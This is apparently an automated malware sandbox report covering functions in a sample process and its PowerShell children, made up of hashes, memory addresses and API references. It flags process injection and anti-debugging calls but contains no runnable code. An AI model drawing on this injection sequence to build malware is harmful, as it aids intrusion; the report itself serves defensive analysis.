Instruction Fuzzy Hash: 3702DC30B042068FDB04EB68C588A6EB7F2FF88218F16C569D5099B369DB74EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CF9A68 Relevance: 5.3, Strings: 4, Instructions: 254COMMON

Download Yara Rule

Strings

lj, xrefs: 02CF9A8A
Xc4l, xrefs: 02CF9BF0
DK4l, xrefs: 02CF9CCC
lj, xrefs: 02CF9A94

Memory Dump Source

Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID: DK4l$Xc4l$lj$lj
API String ID: 0-3905690326
Opcode ID: 6453b386a931daaf4b918d6e321cf6999487f20c051c13dbd46fa6ecdeaae5e7
Instruction ID: 7f2f1f88f47b7061ac45f0d975254a146effa4ed18d438dc431b202c9de95590
Opcode Fuzzy Hash: 6453b386a931daaf4b918d6e321cf6999487f20c051c13dbd46fa6ecdeaae5e7
Instruction Fuzzy Hash: F6A16678B00605CFCB58DF64D4949AEB7F2FF8921472585A9E90A9B361DB31EC42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D8AD3F Relevance: 5.2, Strings: 4, Instructions: 179COMMON

Download Yara Rule

Strings

Fj^, xrefs: 02D8ADD2
Fj^, xrefs: 02D8AE72
Fj^, xrefs: 02D8AE32
=Fj^, xrefs: 02D8AE11

Memory Dump Source

Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID: =Fj^$Fj^$Fj^$Fj^
API String ID: 0-886896601
Opcode ID: 5d440fd828b92d6601b671a72c4e4a9c55502790c3f80da21a5bb91afced7af5
Instruction ID: f319889a1f95bb367d0abe6829244ece6e2933184930f255073242039160bc6a
Opcode Fuzzy Hash: 5d440fd828b92d6601b671a72c4e4a9c55502790c3f80da21a5bb91afced7af5
Instruction Fuzzy Hash: 1451EC5290E3D15FD32767388CBA2953F71CE271A4B1A09E3C0C1CF1A3E959595BD3A2

Uniqueness

Uniqueness Score: -1.00%

Function 02CF6E20 Relevance: 5.2, Strings: 4, Instructions: 179COMMON

Download Yara Rule

Strings

DK4l, xrefs: 02CF6FE0
lj, xrefs: 02CF6E49
Xc4l, xrefs: 02CF6E66
lj, xrefs: 02CF6E3F

Memory Dump Source

Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID: DK4l$Xc4l$lj$lj
API String ID: 0-3905690326
Opcode ID: 7c519799deff1543e7dbfd4681eb64d036112fbba3bcd9fce1239c4fe207f33b
Instruction ID: 6950f3b6e0aaf56925938ab173899f3b2d547c574d38aa3692a543e10c287cff
Opcode Fuzzy Hash: 7c519799deff1543e7dbfd4681eb64d036112fbba3bcd9fce1239c4fe207f33b
Instruction Fuzzy Hash: E05191747005108FC799DF39C494A6EBBF6AFCA60476A80A9D516DB761CF35DC02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02D82069 Relevance: 5.1, Strings: 4, Instructions: 75COMMON

Download Yara Rule

Strings

cFj^, xrefs: 02D8209A
CFj^, xrefs: 02D8210E
SFj^, xrefs: 02D820D4
3Fj^, xrefs: 02D82148

Memory Dump Source

Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID: 3Fj^$CFj^$SFj^$cFj^
API String ID: 0-3859340541
Opcode ID: 03dd841a23894bee1ad136667c946970f615a1eed37f526744707a80c9e0611e
Instruction ID: 060bdb242c260bed602df99979458579abe3da7e93545dc7b96d9ada72c4cc89
Opcode Fuzzy Hash: 03dd841a23894bee1ad136667c946970f615a1eed37f526744707a80c9e0611e
Instruction Fuzzy Hash: C521A1307007504FC775AB39901856BB3E6AFC11483198ABEC15ADB714DF73EC0A9BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D82078 Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

cFj^, xrefs: 02D8209A
CFj^, xrefs: 02D8210E
SFj^, xrefs: 02D820D4
3Fj^, xrefs: 02D82148

Memory Dump Source

Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID: 3Fj^$CFj^$SFj^$cFj^
API String ID: 0-3859340541
Opcode ID: 7e93859af8e5fb738b265417460985f234fddf53e4a1e410bb1f9f6bc5f2b229
Instruction ID: 620ca73bc996c357d32ba32cfa0093729bd270f993048e75fa33cb4e24cc30d3
Opcode Fuzzy Hash: 7e93859af8e5fb738b265417460985f234fddf53e4a1e410bb1f9f6bc5f2b229
Instruction Fuzzy Hash: 2C216F307007505F8779AB39901856BB3E6AFC11483158A7ED11A9B714DF73EC099BA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Systedbddfm.exePID: 820, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	18.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.5%
Total number of Nodes:	67
Total number of Limit Nodes:	1

Executed Functions

Function 00EE29F8 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
Instruction ID: 149167054e4deb95d28ff9ce8f1a7192aa8f0fc0462c3500c5f2f856b116b0fc
Opcode Fuzzy Hash: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
Instruction Fuzzy Hash: 7E31A8B4D052589FCB10CFAAD984ADEFBF5BB49314F10942AE919B7200C774A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0502B2F0 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502B5B7

Memory Dump Source

Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
Instruction ID: 91943f229af520720a7532034bcd90910ec34f818d5853c1b91f7fa2a9ca0376
Opcode Fuzzy Hash: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
Instruction Fuzzy Hash: 61C12571D0422D8FDB20CFA4D984BEEBBB1BF49304F0091A9D949B7240DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0502AED8 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502AFAB

Memory Dump Source

Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
Instruction ID: 3f9a56c949e107a6404a623c224dd090011766a206798a5c1b59123917546d6a
Opcode Fuzzy Hash: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
Instruction Fuzzy Hash: 0141A9B5D052589FCF00CFA9D984AEEFBF1BB49314F14902AE819B7200D778AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0502AD88 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502AE32

Memory Dump Source

Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a665a3c66fc0e60da2b0cac22d5e00fb7a5054b35f732a47cf2445e6be1fe423
Instruction ID: a04ce55cfd64875ac5c54710293a3918208a8761304b965d1218d6791f6ab4e2
Opcode Fuzzy Hash: a665a3c66fc0e60da2b0cac22d5e00fb7a5054b35f732a47cf2445e6be1fe423
Instruction Fuzzy Hash: 5531A9B4D04258DFCF10CFA9D880ADEFBB5BB49310F10902AE915B7200D775A906CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0502ABA0 Relevance: 1.6, APIs: 1, Instructions: 94
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 0502AC4F

Memory Dump Source

Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: ffb9675928cee3ecd1e4a9c8d1741ed9de115d18a3cd529caadb1cd886f597c0
Instruction ID: 09980ccb028279fa58082ec77f9f684f0dd182de684ad665d7a00e73b9e8830a
Opcode Fuzzy Hash: ffb9675928cee3ecd1e4a9c8d1741ed9de115d18a3cd529caadb1cd886f597c0
Instruction Fuzzy Hash: C731ABB4D05258DFCB10DFA9D984AEEFBF5BB48314F24802AE419B7240D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2DC0 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00EE2E61

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: a4251eb6997c9d421efb7050ed8cef5ab024621f5b74ad3d397c76649b22fa6e
Instruction ID: bc9e632c4c1c23cd7735b964d8953b8a25a5b6b5b8502953cb29e6bac2c8b3f5
Opcode Fuzzy Hash: a4251eb6997c9d421efb7050ed8cef5ab024621f5b74ad3d397c76649b22fa6e
Instruction Fuzzy Hash: E431CAB4D052589FCB14CFA9E884AEEFBB5BB89314F10942AE405B7310C774A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2DC8 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00EE2E61

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 3c8a823c9183dc9665cf0734b0da516e0121ea1e1385e7c64883f7e754882d93
Instruction ID: 2135aab280d77fd47397776581018dd0149d2945bd525aef9e8f548cf598896a
Opcode Fuzzy Hash: 3c8a823c9183dc9665cf0734b0da516e0121ea1e1385e7c64883f7e754882d93
Instruction Fuzzy Hash: 3531D9B4D052589BCB14CFA9E880AEEFBB5BB89314F10A42AE805B7310C774A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00EE29F3 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 72ada95053f1f15e253106e6a4e91d6eded61458cc54cafcd9fb14e70fb3765b
Instruction ID: bfe0a1bb5b00ba9a02b8ad1c454c3221da77e4bf10d790974df8f45335609b01
Opcode Fuzzy Hash: 72ada95053f1f15e253106e6a4e91d6eded61458cc54cafcd9fb14e70fb3765b
Instruction Fuzzy Hash: B831BBB4D052589FCF10CFA9D884AEEFBF5BB49314F10942AE915B7200C774A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0502AA80 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0502AAFE

Memory Dump Source

Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e6d5b78f76c9570ad3ed305ebcf5b2516bdbefba661b233aa2596d3b905f5643
Instruction ID: f0176085b2a17e8e0f629a76d3774ccbfe2171e447bd81238d268c712206ef69
Opcode Fuzzy Hash: e6d5b78f76c9570ad3ed305ebcf5b2516bdbefba661b233aa2596d3b905f5643
Instruction Fuzzy Hash: 0231ABB4D052589FCF14CFA9E994AEEFBB5BB48314F14902AE815B7300CB74A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00EE0CFC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 93e9003977efe144004cab345caf3141cc5431537de1776c1dafa07d6d17da2d
Instruction ID: 51c5214b5682e99e91b5835a0c1503b09fc98507a0f78e26fcff6c8115e688f6
Opcode Fuzzy Hash: 93e9003977efe144004cab345caf3141cc5431537de1776c1dafa07d6d17da2d
Instruction Fuzzy Hash: 6B31AAB4D042589FCB10CFA9D484ADEFBF4AB49324F14902AE918B7300C374A841CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2AF3 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a5df7e39f0fd8f792a3ef5fc17209e16ec75ad726d84f4af2b4b8d8a14f2f2e0
Instruction ID: 5dce2ea1c8cfc2120c6c42303ecc2fc75104d04255398482548d775ca5d3bb38
Opcode Fuzzy Hash: a5df7e39f0fd8f792a3ef5fc17209e16ec75ad726d84f4af2b4b8d8a14f2f2e0
Instruction Fuzzy Hash: 3421A8B4D042589FCB10CFA9D884ADEFBF4BB49324F14901AE918B7300C375A841CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D0F4 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49e09d2ca08d614f9bc7b20a70bc7459f6a9c472deec912a62ff300ca5b81e0
Instruction ID: dca3320db7c84088e8a2ab12e00a183d80e6d73dbd4058189024b520e13075df
Opcode Fuzzy Hash: e49e09d2ca08d614f9bc7b20a70bc7459f6a9c472deec912a62ff300ca5b81e0
Instruction Fuzzy Hash: 4D2129B1504340DFDB05DF54D9C0B26BB66FB88714F24856AE9094B286C776D806CBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D01C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca13c2f8d40f1bce21cbb1568697112816724313bdeaedece470659be9335e7
Instruction ID: 44c040cf99bf87323cdef058e2cd1139ab576abf7bbd732dbd7151b18e7f7b3d
Opcode Fuzzy Hash: 3ca13c2f8d40f1bce21cbb1568697112816724313bdeaedece470659be9335e7
Instruction Fuzzy Hash: 282101B0608240DFDB14DF64D9C4B26BBA6FB84718F24C56EE94D4B282C376D847C672

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db849d6352f2e7ff752f9327480704b7f6d1cfa95dbd2260a92e76e47709dbd0
Instruction ID: da9de9d4c8bda3707db6d60b316fd04b5b278aac453c017ee2dd98d424916fb1
Opcode Fuzzy Hash: db849d6352f2e7ff752f9327480704b7f6d1cfa95dbd2260a92e76e47709dbd0
Instruction Fuzzy Hash: 5F2190755093C08FDB12CF24C994B15BF71AB46314F28C5EBD8898B693C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D0EF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe41ec4bf9022dd80f94a3e30c9fad58a81be37ffe9edd9398142aadc540e9ed
Instruction ID: f0d73dbe2ab03d122b01bbbe96be34331bfed22018ee6339aa0ea883a1758112
Opcode Fuzzy Hash: fe41ec4bf9022dd80f94a3e30c9fad58a81be37ffe9edd9398142aadc540e9ed
Instruction Fuzzy Hash: 6111B676504380CFDB11DF54D9C4B56BF72FB84324F28C6AAD8084B696C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EE2304 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
Instruction ID: c941c743422fc82b315ed16e4a0dd8ab57a33e6fad1e86a3a73f536fecd0a928
Opcode Fuzzy Hash: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
Instruction Fuzzy Hash: 0E610FB0E042988FDB14CFA9D884BDEBBF5BB49318F10912AE515BB291DB749846CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00EE0CCC Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
Instruction ID: 3fba785893b0db4f6140c9e3f51ead00e99cf5b394dc971c322eae3ddaed9c4b
Opcode Fuzzy Hash: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
Instruction Fuzzy Hash: 8E5120B0E0025C8FDB14CFA9D884B9EBBB5FB49308F109129E915BB390DBB49845CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2BC4 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
Instruction ID: 48c043bf6604d069aff312cc7677b4425501003b3bc7e88dd0e23f62bf299cff
Opcode Fuzzy Hash: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
Instruction Fuzzy Hash: 8351EEB0D0025C8FDB24CFA9D985BEEFBB5BB49308F20912AD515BB250DBB45846CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00EE0CF0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dec2377dc50c6bb528909cab8098ed9e8b0820a145709c2720f855f4e71c27
Instruction ID: 3a038093a47b665b84747c64e86b5ca6217cc4ea224aef74133115b5d6a0381d
Opcode Fuzzy Hash: 61dec2377dc50c6bb528909cab8098ed9e8b0820a145709c2720f855f4e71c27
Instruction Fuzzy Hash: 1F510FB0D0025CCFDB14CFAAD885B9EBBB6BB89304F10A129E915BB250DB749845CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00EE0D08 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeae6c0020a75c79477cf7b1c71a3af37def8b6c3881782cd970cc1d2133d891
Instruction ID: 99b30d3ca42fffe5732649c9667a01c2f183d399174e67f821d8a871ee2bbf80
Opcode Fuzzy Hash: aeae6c0020a75c79477cf7b1c71a3af37def8b6c3881782cd970cc1d2133d891
Instruction Fuzzy Hash: D251FFB0D0025C8FDB14CFAAD984BEEFBB5BB49304F209129E915BB250DBB49845CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00EE27F7 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec02d613002789c87627fbd0ee857e912a6e37af7f2b553d4d0408c363703d83
Instruction ID: 7d1498c26245b59b337e702908f18f170fdfc2637f03b5b0980e32a634d05b1c
Opcode Fuzzy Hash: ec02d613002789c87627fbd0ee857e912a6e37af7f2b553d4d0408c363703d83
Instruction Fuzzy Hash: 6951FEB0D0025C8FDB14CFA9D885BEEBBF6BB89308F10A12AD915BB250DB745845CF45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3712, Parent PID: 820COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	1

Executed Functions

Function 07A6BDA8 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1be39ad83ab57a37ad4bb4b28f57eaebfa6eec4e085ca992556320a49fb0af34
Instruction ID: f5d9055780f6925929e76f04a20078879f95db2ae9690ccb5e5dd6ee7d3f73eb
Opcode Fuzzy Hash: 1be39ad83ab57a37ad4bb4b28f57eaebfa6eec4e085ca992556320a49fb0af34
Instruction Fuzzy Hash: 3B41ACB1A042599FDB10DFA9C844B9EFBF5FF48314F158169EA18AB281C7749840CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 07A6BE48 Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2

Memory Dump Source

Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 66e4321c918819d76126d35598973e505ba5915f9cf1701b79b2322f833a39d2
Instruction ID: c417526105e42189d9ae73358d93ed0be99916ce0c21d6aca44a23a9f46a9006
Opcode Fuzzy Hash: 66e4321c918819d76126d35598973e505ba5915f9cf1701b79b2322f833a39d2
Instruction Fuzzy Hash: 272114B590425AEFCF10CF9AD884ADEFBB4FF48314F10851AE924A7210C374A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07A6B65C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2

Memory Dump Source

Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1bf3e77e23fd088362e8b2c1f605bee71c83b7a62f0ac34bf3056cf5f3ea47c4
Instruction ID: dec6452d8c2b8f2437c927e01d585ef00b623d86085771a19079bd898b91bed7
Opcode Fuzzy Hash: 1bf3e77e23fd088362e8b2c1f605bee71c83b7a62f0ac34bf3056cf5f3ea47c4
Instruction Fuzzy Hash: 002139B6904259EFCF10CF99D844ADEFBB4FB48314F10811AEA24A7210C375A910CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 07A602B0 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328

Memory Dump Source

Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd6e18f41e524d6dfec5e51912e09b99740245b7731c3db068425b7c5204ad0
Instruction ID: 47c520b748ba68e2e968744ba0af3bb230adc7298f1c6621ed77eb220205c0e6
Opcode Fuzzy Hash: 8dd6e18f41e524d6dfec5e51912e09b99740245b7731c3db068425b7c5204ad0
Instruction Fuzzy Hash: 972136B1C046599BCB14CFAAD544BDEFBF4FB48324F00851AD828A7640D774A941CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 07A602B8 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328

